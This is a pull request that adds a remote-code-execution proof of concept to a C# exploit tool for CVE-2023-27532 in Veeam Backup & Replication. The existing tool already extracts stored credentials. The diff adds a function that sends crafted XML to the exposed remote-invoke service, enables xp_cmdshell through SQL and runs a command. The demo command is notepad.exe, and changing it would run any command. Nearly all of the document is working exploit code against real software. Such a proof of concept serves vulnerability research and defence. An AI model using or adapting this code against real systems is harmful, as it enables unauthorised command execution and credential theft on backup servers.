### PR TITLE
feat: add rce poc to pop notepad.exe on target

### DIFF
--- a/CVE-2023-27532/Program.cs
+++ b/CVE-2023-27532/Program.cs
@@ -92,6 +92,28 @@ class Program
         }
         Console.WriteLine();
     }
+
+    // RCE poc
+    // https://attackerkb.com/topics/ALUsuJioE5/cve-2023-27532/rapid7-analysis
+    // https://github.com/sfewer-r7/CVE-2023-27532
+    static void GetExec(IRemoteInvokeService proxy)
+    { 
+        // pop notepad.exe
+        string cmd = "c:\\windows\\notepad.exe";
+        Console.WriteLine("Attempting to execute: {0}", cmd);
+
+        var xml = "" +
+                  "<RemoteInvokeSpec ContextSessionId=\"00000000-0000-0000-0000-000000000000\">\n" +
+                  "<DbGetDataTableRemoteInvokeSpec>\n" +
+                  $"<SqlCommand>EXEC sp_configure 'show advanced options', 1; EXEC sp_configure reconfigure; EXEC sp_configure 'xp_cmdshell', 1; EXEC sp_configure reconfigure; EXEC xp_cmdshell '{cmd}';</SqlCommand>\n" +
+                  "<CommandType>1</CommandType>\n" +
+                  "</DbGetDataTableRemoteInvokeSpec>\n" +
+                  "</RemoteInvokeSpec>";
+
+        proxy.GetDataTable(ERemoteInvokeScope.DatabaseAccessor,
+            ERemoteInvokeMethod.GetDataTable,
+            xml);
+    }
     
     static void Main(string[] args)
     {
@@ -112,5 +134,8 @@ class Program
         {
             GetCred(guid, proxy);
         }
+
+        // call RCE poc
+        GetExec(proxy);
     }
 }

--- a/CVE-2023-27532/RemoteInvokeInterface.cs
+++ b/CVE-2023-27532/RemoteInvokeInterface.cs
@@ -1,5 +1,6 @@
 using System.Runtime.Serialization;
 using System.ServiceModel;
+using System.Data;
 
 namespace CVE_2023_27532;
 
@@ -7,6 +8,7 @@ namespace CVE_2023_27532;
 public enum ERemoteInvokeScope
 {
     [EnumMember] DatabaseManager,
+    [EnumMember] DatabaseAccessor,
 }
 
 [DataContract(Name = "InvokeMethod")]
@@ -14,6 +16,7 @@ public enum ERemoteInvokeMethod
 {
     [EnumMember] CredentialsDbScopeFindCredentials,
     [EnumMember] CredentialsDbScopeGetAllCreds,
+    [EnumMember] GetDataTable,
 }
 
 [ServiceContract(Name = "IRemoteInvokeService")]
@@ -21,4 +24,7 @@ public interface IRemoteInvokeService
 {
     [OperationContract]
     string Invoke(ERemoteInvokeScope scope, ERemoteInvokeMethod method, string parameters);
+
+    [OperationContract]
+    DataTable GetDataTable(ERemoteInvokeScope scope, ERemoteInvokeMethod method, string spec);
 }


### PR DESCRIPTION
Another POC is available that also performs RCE in addition to pulling creds.

Refer:
- https://attackerkb.com/topics/ALUsuJioE5/cve-2023-27532/rapid7-analysis
- https://github.com/sfewer-r7/CVE-2023-27532

However, it depends on Veeam DLLs. I've made changes to achieve RCE without those DLLs.
It's pretty crude so feel free to suggest changes.